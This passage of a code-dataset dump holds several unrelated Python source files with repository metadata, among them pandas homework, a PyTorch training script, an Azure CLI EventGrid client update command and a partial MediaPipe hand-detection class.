unavailable. Available values are : ' + ', '.join(['linkedplaces', 'inline-linkedplaces']))\n func = export_funcs[asked_format]\n try:\n data = json_loads(response.data)\n output_data, status, headers, content_type = func(request, data)\n response = JSONAPIResponseFactory.make_response(\n resource=output_data,\n status=status,\n headers=headers,\n content_type=content_type\n )\n except Exception as e:\n return error_403(str(e))\n return response\n\n return wrapped_f\n\n return wrap\n\n\n\n\n","repo_name":"chartes/dico-topo-app","sub_path":"app/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"11224480824","text":"import pandas as pd \nimport numpy as np\n\n#Don't forget to change the directory before importing the file\nmovies_dataset=pd.read_excel(\"movie_metadata.xlsx\")\n\n#Question 1\n#استخدام التابع shape، ما هو عدد الأسطر والأعمدة الموجودة في البيانات؟\nprint(movies_dataset.shape)\n\n#Question 2\n\n#Yes, each row for one movie\n\n#Question 3\n#ما هي أطول مدة فيلم موجودة في البيانات؟\nmax_value=max(movies_dataset.duration)\nprint(max_value)\n\n\n#Question 4\n#ما هو اسم أقصر فيلم موجود في البيانات؟\n#result_movie_titles=movies_dataset[\"movie_title\"] \nmin_duration=min(movies_dataset.duration)\nprint(min_duration)#طلعت اقل مدة زمنية رقما\n\n#looping through spesific DataFrames rows \nfor row_label,row in movies_dataset.iterrows():\n if row[\"duration\"]==min_duration: \n print(row[\"movie_title\"])\n\n\n#Question 5\n#الكود التالي يقوم باضافة عمود جديد إلى البيانات اسمه \n# \"duration_in_minutes\"\n#يحتوي على مدة الفيلم الواحد بالساعات\n\nduration_in_minutes=movies_dataset[\"duration\"]/60\nmovies_dataset[\"duration_in_minutes\"]=duration_in_minutes\n\n#Yes\n\n#ما هو عدد الأفلام التي قام بإخراجها المخرج\n#James Cameron\n\n#Question 6\nx=movies_dataset['director_name']==\"James Cameron\"\ndf1=movies_dataset[x]\nresult=df1[\"director_name\"].count()\nprint(result)\n\n#ما هو المتوسط الخاص بمدة الأفلام الموجودة في البيانات\n#Question 7\nprint(np.mean(movies_dataset[\"duration\"]))\n\n\n#ما هو الوسيط الخاص بمدة الأفلام الموجودة في البيانات\n#Question 8\nprint(np.median(movies_dataset[\"duration\"]))\n\n\n#ما هو عدد الأفلام التي لغتها هي\n#\"Danish\" أو \"Dutch\" \n#Question 9\ny=np.logical_or(movies_dataset['language']==\"Danish\",\n movies_dataset['language']==\"Dutch\")\n\ndf2=movies_dataset[y]\nresult2=df2[\"language\"].count()\nprint(result2)\n\n#ما هو عدد الأفلام التي تم انتاجها في \"USA\"\n#Question 10\nz=movies_dataset['country']==\"USA\"\ndf3=movies_dataset[z]\nresult3=df3[\"country\"].count()\nprint(result3)\n\n#قم بانشاء تقرير يظهر عدد الأفلام الملونة وعدد الأفلام بالأبيض والأسود التي تم انتاجها في \"USA\"\n#بالاعتماد على هذا التقرير ما هو عدد الأفلام الملونة وعدد الأفلام بالأبيض والأسود؟\n#Question 11\n\nmovies_report_1=pd.pivot_table(df3,index=['is_colored']\n ,values=['country']\n ,aggfunc=\"count\")\n\nprint(movies_report_1)\n# =============================================================================\n\n#Question 12\n\nmovies_report_2=pd.pivot_table(df3,index=['main_genre']\n ,values=[\"country\",\n \"imdb_score\"]\n ,aggfunc={\"country\":\"count\",\n \"imdb_score\":np.mean,\n })\n\n\nprint(movies_report_2.sort_values(\"imdb_score\"))\n\n\n\n#Question 13\n#\"main genre\" قم بانشاء تقرير يظهر عدد الأفلام ومتوسط تقييمات الأفلام حسب ال \n# التي تم انتاجها في \"USA\"\n#بالاعتماد على هذا التقرير\n#ما هي أعلى ثلاثة genres حسب متوسط التقييمات؟\n\nmovies_report_3=pd.pivot_table(df3,index=['main_genre']\n ,values=[\"imdb_score\",\n \"budget\"]\n ,aggfunc={\"imdb_score\":np.mean,\n \"budget\":np.mean,\n })\n\n\nprint(movies_report_3.sort_values(\"budget\"))\n\n#Question 14\n#قم بانشاء تقرير يظهر متوسط تقييمات الأفلام ومتوسط تكلفة الأفلام حسب ال \"main genre\" \n#التي تم انتاجها في \"USA\"\n#بالاعتماد على هذا التقرير ما هي أعلى ثلاثة genres حسب متوسط تكلفة الفيلم؟\nmovies_report_3=pd.pivot_table(df3,index=['main_genre']\n ,values=\"gross\"\n \n ,aggfunc={\"gross\":np.mean })\n\n\nprint(movies_report_3.sort_values(\"gross\"))\n\n\n\n","repo_name":"shadenalmangour/Paython_Practise","sub_path":"Week4/final_project_template.py","file_name":"final_project_template.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30112331871","text":"# -*- coding = uft-8 -*-\n# @File : G04b_pywin32.py\n# @Time : 2022/12/10 13:31 \n# @Author : Samuel HONG\n# @Description : How to acquire hwnd using python\n# @Version :\n\nimport sys\nimport win32gui\nimport win32con\n\n\n# get hwnd of all the windows.\ndef get_all_windows():\n hWnd_list = []\n win32gui.EnumWindows(lambda hWnd, param: param.append(hWnd), hWnd_list)\n print(hWnd_list)\n return hWnd_list\n\n\n# get hwnd of a sub window.\ndef get_son_windows(parent):\n hWnd_child_list = []\n win32gui.EnumChildWindows(parent, lambda hWnd, param: param.append(hWnd), hWnd_child_list)\n print(hWnd_child_list)\n return hWnd_child_list\n\n\n# get hwnd title.\ndef get_title(hwnd):\n title = win32gui.GetWindowText(hwnd)\n print('窗口标题:%s' % (title))\n return title\n\n\n# get hwnd classname.\ndef get_classname(hwnd):\n classname = win32gui.GetClassName(hwnd)\n print('窗口类名:%s' % (classname))\n return classname\n\n\nif __name__ == '__main__':\n hwnd_li = get_all_windows()\n for i in hwnd_li:\n print(i)\n get_title(i)\n print('\\r')\n\n hwnd = 197524\n title = win32gui.GetWindowText(hwnd)\n print(title)\n","repo_name":"IzumiOdotto/LabFile203","sub_path":"sampling_design/GUI/G04b_pywin32.py","file_name":"G04b_pywin32.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24778796235","text":"from random import *\n# import openpyxl\nimport openpyxl\nfrom openpyxl import Workbook\n\n# создадим рандомные данные в exel файл\n\n\nworkbook = Workbook()\nworksheet = workbook.active\n\nworksheet.cell(row=1, column=1).value = \"Имя\"\nworksheet.cell(row=1, column=2).value = \"Фамилия\"\nworksheet.cell(row=1, column=3).value = \"Должность\"\n\nlist_first_name = [\"Александр\", \"Михаил\", \"Максим\", \"Даниил\", \"Лев\", \"Артем\", \"Марк\", \"Иван\", \"Дмитрий\", \"Матвей\",\n \"Андрей\", \"Никита\", \"Егор\", \"Алексей\", \"Арсений\", \"Константин\", \"Давид\", \"Сергей\"]\nlist_second_name = [\"Смирнов\", \"Иванов\", \"Кузнецов\", \"Соколов\", \"Попов\", \"Лебедев\", \"Козлов\", \"Новиков\", \"Морозов\",\n \"Петров\", \"Волков\", \"Соловьёв\"]\nlist_work = [\"junior\", \"middle\", \"senior\"]\n\nfor row in range(1, 100):\n worksheet.cell(row=row, column=1).value = choice(list_first_name)\n worksheet.cell(row=row, column=2).value = choice(list_second_name)\n worksheet.cell(row=row, column=3).value = choice(list_work)\n\nworkbook.save(\"first_doc.xlsx\")\n\n# создадим рандомные данные в exel файл\n\n\n# переносим данные\n\nname_file = \"first_doc.xlsx\"\nworkbook = openpyxl.load_workbook(name_file)\nworksheet = workbook.active\n\n\nclass Main:\n def __init__(self):\n self.global_list = []\n row = 1\n col = 1\n while True:\n local_list = []\n while True:\n value = worksheet.cell(row=row, column=col).value\n if value is None:\n break\n local_list.append(value)\n col += 1\n self.global_list.append(local_list)\n row += 1\n col = 1\n value = worksheet.cell(row=row, column=col).value\n if value is None:\n break\n\n\nresults = Main()\nresults = results.global_list\n\nworkbook2 = Workbook()\nworksheet2 = workbook2.active\n\nindex = 0\n\n\nclass Create:\n def __init__(self, index):\n for row in results:\n print(row)\n for col in row:\n print(col)\n index_col = row.index(col)\n # index_row = results.index(row)\n worksheet2.cell(row=index + 1, column=index_col + 1).value = str(col)\n index += 1\n\n\ngo = Create(index)\n\nworkbook2.save(\"result.xlsx\")\n\n# переносим данные\n","repo_name":"SoloLeveling2005/python1","sub_path":"HW/14_06_2022/TASK_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30955073988","text":"import time, os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport random\nfrom datetime import datetime\n\nfrom options import get_args\nfrom data import build_dataset\nfrom model import build_model\n\n\nif __name__=='__main__':\n\n tic = time.time()\n opt, message = get_args()\n print(message)\n if not opt.isTest: \n #random.seed(opt.seed)\n #np.random.seed(opt.seed)\n #torch.manual_seed(opt.seed)\n #torch.cuda.manual_seed_all(opt.seed)\n #torch.backends.cudnn.benchmark = True\n \n # build the dataset according to the options\n tr_loader, val_loader = build_dataset(opt)\n model = build_model(opt)\n model.setup()\n\n metric = []\n best_val_loss = 1000.0\n for epoch in range(opt.start_epoch, opt.epochs+opt.epochs_decay+opt.start_epoch):\n epoch_start_time = time.time()\n iter_data_time = time.time()\n\n old_lr, lr = model.update_learning_rate()\n\n tr_loss, tr_time, tr_data_time = model.train_one_epoch(tr_loader)\n val_loss, val_time, val_data_time = model.test_one_epoch(val_loader)\n\n if val_loss < best_val_loss:\n best_val_loss = val_loss\n model.save_networks('best')\n\n if (epoch > opt.save_start_epoch) and (epoch % opt.save_freq == 0):\n model.save_networks(epoch)\n\n print(f\"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]\",\n f'Epoch [{epoch}/{opt.epochs+opt.epochs_decay}]',\n f'Time [epoch {time.time() - epoch_start_time:.6f}, data-tr {tr_data_time:.6f}, data-val {val_data_time:.6f}, train {tr_time:.6f}, val {val_time:.6f}]',\n f'Loss [train {tr_loss:.6f}, val {val_loss:.6f}]',\n f'lr [{old_lr:.6f} -> {lr:.6f}]')\n metric.append([epoch, tr_loss, val_loss, lr])\n columns = ['epoch', 'tr_loss', 'val_loss', 'lr']\n pd.DataFrame(data=metric, columns=columns).to_csv(\n os.path.join(model.save_dir, 'training.csv'), index=False) \n else:\n tr_loader, val_loader, te_loader = build_dataset(opt)\n model = build_model(opt)\n model.setup()\n tr_loss, tr_time, tr_data_time = model.test_one_epoch(tr_loader, savename='train')\n val_loss, val_time, val_data_time = model.test_one_epoch(\n val_loader, savename='val')\n te_loss, te_time, te_data_time = model.test_one_epoch(\n te_loader, savename='test')\n print(f\"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]\",\n f\"Time {te_time+val_time+te_time}\",\n f\"loss [train: {tr_loss:.6f}, val: {val_loss:6f}, test: {te_loss:.6f}]\")\n print(f'Time consuming for all epochs: {(time.time() - tic)/60:.2f} minutes.')\n\n","repo_name":"cvvsu/RMEP","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40108624818","text":"from azure.cli.core.aaz import *\n\n\n@register_command(\n \"eventgrid namespace client update\",\n is_preview=True,\n)\nclass Update(AAZCommand):\n \"\"\"Update a client.\n\n :example: Update client\n az eventgrid namespace client update -g rg --namespace-name name -n client-name --description test\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2023-06-01-preview\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.eventgrid/namespaces/{}/clients/{}\", \"2023-06-01-preview\"],\n ]\n }\n\n AZ_SUPPORT_NO_WAIT = True\n\n AZ_SUPPORT_GENERIC_UPDATE = True\n\n def _handler(self, command_args):\n super()._handler(command_args)\n return self.build_lro_poller(self._execute_operations, self._output)\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n _args_schema = cls._args_schema\n _args_schema.client_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--client-name\"],\n help=\"Name of the client.\",\n required=True,\n id_part=\"child_name_1\",\n fmt=AAZStrArgFormat(\n pattern=\"^[-a-zA-Z0-9:\\._]*$\",\n max_length=128,\n min_length=1,\n ),\n )\n _args_schema.namespace_name = AAZStrArg(\n options=[\"--namespace-name\"],\n help=\"Name of the namespace.\",\n required=True,\n id_part=\"name\",\n fmt=AAZStrArgFormat(\n pattern=\"^[a-zA-Z0-9-]*$\",\n max_length=50,\n min_length=3,\n ),\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n required=True,\n )\n\n # define Arg Group \"Properties\"\n\n _args_schema = cls._args_schema\n _args_schema.attributes = AAZFreeFormDictArg(\n options=[\"--attributes\"],\n arg_group=\"Properties\",\n help=\"Attributes for the client.\",\n nullable=True,\n )\n _args_schema.authentication = AAZObjectArg(\n options=[\"--authentication\"],\n arg_group=\"Properties\",\n help=\"Authentication information for the client.\",\n nullable=True,\n )\n _args_schema.client_certificate_authentication = AAZObjectArg(\n options=[\"--client-certificate-authentication\"],\n arg_group=\"Properties\",\n help=\"The client certificate authentication information.\",\n nullable=True,\n )\n _args_schema.description = AAZStrArg(\n options=[\"--description\"],\n arg_group=\"Properties\",\n help=\"Description for the Client resource.\",\n nullable=True,\n )\n _args_schema.state = AAZStrArg(\n options=[\"--state\"],\n arg_group=\"Properties\",\n help=\"Indicates if the client is enabled or not. Default value is Enabled.\",\n nullable=True,\n enum={\"Disabled\": \"Disabled\", \"Enabled\": \"Enabled\"},\n )\n\n authentication = cls._args_schema.authentication\n authentication.certificate_subject = AAZObjectArg(\n options=[\"certificate-subject\"],\n help=\"The CA certificate subject name used for authentication.\",\n nullable=True,\n )\n authentication.certificate_thumbprint = AAZObjectArg(\n options=[\"certificate-thumbprint\"],\n help=\"The self signed certificate's thumbprints data used for authentication.\",\n nullable=True,\n )\n\n certificate_subject = cls._args_schema.authentication.certificate_subject\n certificate_subject.common_name = AAZStrArg(\n options=[\"common-name\"],\n help=\"The common name field in the subject name. The allowed limit is 64 characters and it should be specified.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=64,\n min_length=0,\n ),\n )\n certificate_subject.country_code = AAZStrArg(\n options=[\"country-code\"],\n help=\"The country code field in the subject name. If present, the country code should be represented by two-letter code defined in ISO 2166-1 (alpha-2). For example: 'US'.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=2,\n min_length=2,\n ),\n )\n certificate_subject.organization = AAZStrArg(\n options=[\"organization\"],\n help=\"The organization field in the subject name. If present, the allowed limit is 64 characters.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=64,\n min_length=0,\n ),\n )\n certificate_subject.organization_unit = AAZStrArg(\n options=[\"organization-unit\"],\n help=\"The organization unit field in the subject name. If present, the allowed limit is 32 characters.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=32,\n min_length=0,\n ),\n )\n\n certificate_thumbprint = cls._args_schema.authentication.certificate_thumbprint\n certificate_thumbprint.primary = AAZStrArg(\n options=[\"primary\"],\n help=\"The primary thumbprint used for validation.\",\n nullable=True,\n )\n certificate_thumbprint.secondary = AAZStrArg(\n options=[\"secondary\"],\n help=\"The secondary thumbprint used for validation.\",\n nullable=True,\n )\n\n client_certificate_authentication = cls._args_schema.client_certificate_authentication\n client_certificate_authentication.allowed_thumbprints = AAZListArg(\n options=[\"allowed-thumbprints\"],\n help=\"The list of thumbprints that are allowed during client authentication. This property is required only if the validationScheme is 'ThumbprintMatch'.\",\n nullable=True,\n )\n client_certificate_authentication.validation_scheme = AAZStrArg(\n options=[\"validation-scheme\"],\n help=\"The validation scheme used to authenticate the client. Default value is SubjectMatchesAuthenticationName.\",\n nullable=True,\n enum={\"DnsMatchesAuthenticationName\": \"DnsMatchesAuthenticationName\", \"EmailMatchesAuthenticationName\": \"EmailMatchesAuthenticationName\", \"IpMatchesAuthenticationName\": \"IpMatchesAuthenticationName\", \"SubjectMatchesAuthenticationName\": \"SubjectMatchesAuthenticationName\", \"ThumbprintMatch\": \"ThumbprintMatch\", \"UriMatchesAuthenticationName\": \"UriMatchesAuthenticationName\"},\n )\n\n allowed_thumbprints = cls._args_schema.client_certificate_authentication.allowed_thumbprints\n allowed_thumbprints.Element = AAZStrArg(\n nullable=True,\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.ClientsGet(ctx=self.ctx)()\n self.pre_instance_update(self.ctx.vars.instance)\n self.InstanceUpdateByJson(ctx=self.ctx)()\n self.InstanceUpdateByGeneric(ctx=self.ctx)()\n self.post_instance_update(self.ctx.vars.instance)\n yield self.ClientsCreateOrUpdate(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n @register_callback\n def pre_instance_update(self, instance):\n pass\n\n @register_callback\n def post_instance_update(self, instance):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class ClientsGet(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/namespaces/{namespaceName}/clients/{clientName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"GET\"\n\n @property\n def error_format(self):\n return \"MgmtErrorFormat\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"clientName\", self.ctx.args.client_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"namespaceName\", self.ctx.args.namespace_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2023-06-01-preview\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n _UpdateHelper._build_schema_client_read(cls._schema_on_200)\n\n return cls._schema_on_200\n\n class ClientsCreateOrUpdate(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [202]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200_201,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n if session.http_response.status_code in [200, 201]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200_201,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/namespaces/{namespaceName}/clients/{clientName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"PUT\"\n\n @property\n def error_format(self):\n return \"MgmtErrorFormat\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"clientName\", self.ctx.args.client_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"namespaceName\", self.ctx.args.namespace_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2023-06-01-preview\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Content-Type\", \"application/json\",\n ),\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n @property\n def content(self):\n _content_value, _builder = self.new_content_builder(\n self.ctx.args,\n value=self.ctx.vars.instance,\n )\n\n return self.serialize_content(_content_value)\n\n def on_200_201(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200_201\n )\n\n _schema_on_200_201 = None\n\n @classmethod\n def _build_schema_on_200_201(cls):\n if cls._schema_on_200_201 is not None:\n return cls._schema_on_200_201\n\n cls._schema_on_200_201 = AAZObjectType()\n _UpdateHelper._build_schema_client_read(cls._schema_on_200_201)\n\n return cls._schema_on_200_201\n\n class InstanceUpdateByJson(AAZJsonInstanceUpdateOperation):\n\n def __call__(self, *args, **kwargs):\n self._update_instance(self.ctx.vars.instance)\n\n def _update_instance(self, instance):\n _instance_value, _builder = self.new_content_builder(\n self.ctx.args,\n value=instance,\n typ=AAZObjectType\n )\n _builder.set_prop(\"properties\", AAZObjectType, typ_kwargs={\"flags\": {\"client_flatten\": True}})\n\n properties = _builder.get(\".properties\")\n if properties is not None:\n properties.set_prop(\"attributes\", AAZFreeFormDictType, \".attributes\")\n properties.set_prop(\"authentication\", AAZObjectType, \".authentication\")\n properties.set_prop(\"clientCertificateAuthentication\", AAZObjectType, \".client_certificate_authentication\")\n properties.set_prop(\"description\", AAZStrType, \".description\")\n properties.set_prop(\"state\", AAZStrType, \".state\")\n\n attributes = _builder.get(\".properties.attributes\")\n if attributes is not None:\n attributes.set_anytype_elements(\".\")\n\n authentication = _builder.get(\".properties.authentication\")\n if authentication is not None:\n authentication.set_prop(\"certificateSubject\", AAZObjectType, \".certificate_subject\")\n authentication.set_prop(\"certificateThumbprint\", AAZObjectType, \".certificate_thumbprint\")\n\n certificate_subject = _builder.get(\".properties.authentication.certificateSubject\")\n if certificate_subject is not None:\n certificate_subject.set_prop(\"commonName\", AAZStrType, \".common_name\")\n certificate_subject.set_prop(\"countryCode\", AAZStrType, \".country_code\")\n certificate_subject.set_prop(\"organization\", AAZStrType, \".organization\")\n certificate_subject.set_prop(\"organizationUnit\", AAZStrType, \".organization_unit\")\n\n certificate_thumbprint = _builder.get(\".properties.authentication.certificateThumbprint\")\n if certificate_thumbprint is not None:\n certificate_thumbprint.set_prop(\"primary\", AAZStrType, \".primary\")\n certificate_thumbprint.set_prop(\"secondary\", AAZStrType, \".secondary\")\n\n client_certificate_authentication = _builder.get(\".properties.clientCertificateAuthentication\")\n if client_certificate_authentication is not None:\n client_certificate_authentication.set_prop(\"allowedThumbprints\", AAZListType, \".allowed_thumbprints\")\n client_certificate_authentication.set_prop(\"validationScheme\", AAZStrType, \".validation_scheme\")\n\n allowed_thumbprints = _builder.get(\".properties.clientCertificateAuthentication.allowedThumbprints\")\n if allowed_thumbprints is not None:\n allowed_thumbprints.set_elements(AAZStrType, \".\")\n\n return _instance_value\n\n class InstanceUpdateByGeneric(AAZGenericInstanceUpdateOperation):\n\n def __call__(self, *args, **kwargs):\n self._update_instance_by_generic(\n self.ctx.vars.instance,\n self.ctx.generic_update_args\n )\n\n\nclass _UpdateHelper:\n \"\"\"Helper class for Update\"\"\"\n\n _schema_client_read = None\n\n @classmethod\n def _build_schema_client_read(cls, _schema):\n if cls._schema_client_read is not None:\n _schema.id = cls._schema_client_read.id\n _schema.name = cls._schema_client_read.name\n _schema.properties = cls._schema_client_read.properties\n _schema.system_data = cls._schema_client_read.system_data\n _schema.type = cls._schema_client_read.type\n return\n\n cls._schema_client_read = _schema_client_read = AAZObjectType()\n\n client_read = _schema_client_read\n client_read.id = AAZStrType(\n flags={\"read_only\": True},\n )\n client_read.name = AAZStrType(\n flags={\"read_only\": True},\n )\n client_read.properties = AAZObjectType(\n flags={\"client_flatten\": True},\n )\n client_read.system_data = AAZObjectType(\n serialized_name=\"systemData\",\n flags={\"read_only\": True},\n )\n client_read.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = _schema_client_read.properties\n properties.attributes = AAZFreeFormDictType()\n properties.authentication = AAZObjectType()\n properties.authentication_name = AAZStrType(\n serialized_name=\"authenticationName\",\n )\n properties.client_certificate_authentication = AAZObjectType(\n serialized_name=\"clientCertificateAuthentication\",\n )\n properties.description = AAZStrType()\n properties.provisioning_state = AAZStrType(\n serialized_name=\"provisioningState\",\n flags={\"read_only\": True},\n )\n properties.state = AAZStrType()\n\n authentication = _schema_client_read.properties.authentication\n authentication.certificate_subject = AAZObjectType(\n serialized_name=\"certificateSubject\",\n )\n authentication.certificate_thumbprint = AAZObjectType(\n serialized_name=\"certificateThumbprint\",\n )\n\n certificate_subject = _schema_client_read.properties.authentication.certificate_subject\n certificate_subject.common_name = AAZStrType(\n serialized_name=\"commonName\",\n )\n certificate_subject.country_code = AAZStrType(\n serialized_name=\"countryCode\",\n )\n certificate_subject.organization = AAZStrType()\n certificate_subject.organization_unit = AAZStrType(\n serialized_name=\"organizationUnit\",\n )\n\n certificate_thumbprint = _schema_client_read.properties.authentication.certificate_thumbprint\n certificate_thumbprint.primary = AAZStrType()\n certificate_thumbprint.secondary = AAZStrType()\n\n client_certificate_authentication = _schema_client_read.properties.client_certificate_authentication\n client_certificate_authentication.allowed_thumbprints = AAZListType(\n serialized_name=\"allowedThumbprints\",\n )\n client_certificate_authentication.validation_scheme = AAZStrType(\n serialized_name=\"validationScheme\",\n )\n\n allowed_thumbprints = _schema_client_read.properties.client_certificate_authentication.allowed_thumbprints\n allowed_thumbprints.Element = AAZStrType()\n\n system_data = _schema_client_read.system_data\n system_data.created_at = AAZStrType(\n serialized_name=\"createdAt\",\n )\n system_data.created_by = AAZStrType(\n serialized_name=\"createdBy\",\n )\n system_data.created_by_type = AAZStrType(\n serialized_name=\"createdByType\",\n )\n system_data.last_modified_at = AAZStrType(\n serialized_name=\"lastModifiedAt\",\n )\n system_data.last_modified_by = AAZStrType(\n serialized_name=\"lastModifiedBy\",\n )\n system_data.last_modified_by_type = AAZStrType(\n serialized_name=\"lastModifiedByType\",\n )\n\n _schema.id = cls._schema_client_read.id\n _schema.name = cls._schema_client_read.name\n _schema.properties = cls._schema_client_read.properties\n _schema.system_data = cls._schema_client_read.system_data\n _schema.type = cls._schema_client_read.type\n\n\n__all__ = [\"Update\"]\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/eventgrid/azext_eventgrid/aaz/latest/eventgrid/namespace/client/_update.py","file_name":"_update.py","file_ext":"py","file_size_in_byte":22289,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"16083866384","text":"def weighted_average(in_file_name, out_file_name):\n in_file = open(in_file_name, \"r\")\n out_file = open(out_file_name, \"w\")\n data = in_file.readlines()\n class_avg = 1\n class_total = 0\n for words in data:\n no_name_split = words.split(\": \")\n nums = no_name_split[1]\n nums = nums.split(\" \")\n total = 0\n weight_total = 0\n for i in range(0, len(nums), 2):\n weight_num = nums[i]\n grade_num = nums[i + 1]\n product = int(weight_num) * int(grade_num)\n total = total + product\n weight_total += int(weight_num)\n\n if weight_total == 100:\n student_avg = (total / 100)\n class_total = class_total + student_avg\n class_avg = class_total / len(data)\n print(no_name_split[0] + \"'s average: \", round(student_avg, 1), file=out_file)\n elif weight_total > 100:\n print(no_name_split[0] + \"'s average: Error: The weights are more than 100.\", file=out_file)\n else:\n print(no_name_split[0] + \"'s average: Error: The weights are less than 100.\", file=out_file)\n print(\"Class Average: \", round(class_avg, 1), file=out_file)\n in_file.close()\n out_file.close()\n\n\nif __name__ == '__main__':\n weighted_average(\"grades.txt\", \"avg.txt\")\n","repo_name":"Spencerhoag/220","sub_path":"labs/lab7/lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8451725661","text":"import cv2 as cv\nimport mediapipe as mp\nimport time\n\nclass handDetection():\n\n # Defining a function for initialization of \"Mediapipe's Hands() function\"\n def __init__(self, imageMode=False, maxHandNumber=2, modelComplexity=1, detectConf=0.5, trackConf=0.5):\n self.imageMode = imageMode\n self.maxHandNumber = maxHandNumber\n self.detectConf = detectConf\n self.trackConf = trackConf\n self.modelComplexity = modelComplexity\n\n # Declaring a 'self' variable to start Mediapipe hand detection module\n self.mpHandModule = mp.solutions.hands\n\n # Declaring another 'self' variable for detecting hands\n self.detectHands = self.mpHandModule.Hands(self.imageMode, self.maxHandNumber, self.modelComplexity,\n self.detectConf, self.trackConf)\n\n # Declaring another 'self' variable to draw lines between landmarks of hands\n self.mpDraw = mp.solutions.drawing_utils\n\n # Creating an array that stores the IDs of fingertips\n self.tipIDs = [4, 8, 12, 16, 20]\n\n\n # Defining a function to find hands in the frame\n def findHand(self, frame, draw=True):\n\n # Converting frame to RGB in order to Mediapipe module to process \n RGBframe = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n self.handResult = self.detectHands.process(RGBframe)\n\n # Marking hand landmarks 